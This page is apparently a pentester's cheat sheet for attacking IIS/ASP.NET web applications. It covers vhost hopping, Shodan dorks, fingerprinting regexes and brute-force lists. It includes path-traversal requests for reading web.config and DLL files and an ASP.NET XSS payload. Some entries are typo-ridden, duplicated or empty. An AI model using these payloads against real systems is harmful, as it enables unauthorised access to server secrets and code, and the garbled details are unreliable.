Page cover image

Hacking IIS Applications

Resources

https://youtu.be/XlmeSFm3RT4?si=hfhzGF9ymG6Igt5j

https://www.youtube.com/watch?v=cqM-MdPkaWo

https://www.youtube.com/watch?v=yyD8Z5Qar5I

https://www.youtube.com/watch?v=_4W0WXUatiw

HTTPAPI 2.0 Assets

  • Got HTTPAPI ERROR 404

  • It is IP but you can get the subdomain from the certificate common name

  • Edit the Host Header

VHost Hopping

  • Came across subdomain that running IIS Server apply.company.com

  • VHost Enumeration using ffuf or burp intruder

  • Found mssql.company.com

  • Running MSSQL Explorer/Manager

Local FIle Disclosure to DLLs

  • DownloadCategoryExcel?fileName=../../web.config

  • DownloadCategoryExcel?fileName=../../glopal.asax

  • <add namespace="Company.Web.Api.dell/>

  • DownloadCategoryExcel?fileName=../../bin/Company.Web.Api.dll

LFD -> RCE

RCE with Local

ASP.NET XSS

  • Try in login pages, redirects, forms & dynamic URL construction (~/images/). Payload: /(A(%22onerror='alert%60123%60'test))/

DNSpy

IIS Discovery Bruteforce

Partial Fuzzing

Nuclei

Check out the Nuclei templates for fuzzing techniques.

Fingerprinting with Shodan

Utilize Shodan to identify IIS instances with specific characteristics:

  • http.title:"IIS"

  • Ssl:"Company Inc." http.title:"IIS"

  • Ssl.cert.subject.CN:"company.in" http.title:"IIS"

Fingerprinting Techniques

Cookies

  • ASP.NET_Sessionid

  • ASPSESSION

Headers Regex

  • X-AspNet-Version: (.*)\\;version:\\1

  • X-Powered-By:^ASP\\.NET

HTML Regex

  • <input[^>]+name\"_VIEWSTATE

URL Regex

  • \\.aspx?(?.$|\\?)

Ignoring Directories from Scanning

Exclude these directories from your scans:

  • ASPNET~1

  • DEFAULT~1.ASP

  • DEFAULT~1.CSS

  • GLOBAL.ASA

  • GLOBAL.ASP

  • GLOBAL.CS

  • MASTER.CS

  • WEB.CON

Extensions to Bruteforce

Bruteforce file extensions to uncover vulnerabilities:

  • .aspx (Legacy active server pages)

  • .aspx (Modern Active server pages)

  • .ashx (APIs/AJAX)

  • .wsdl (Web Services Description Language)

  • .wadl (Web Application Description Languages)

  • .asmx (XML Web Services)

  • .xml

  • .zip

  • .txt

Port Scanning

  • naabu -host iis.target.com

Last updated

Was this helpful?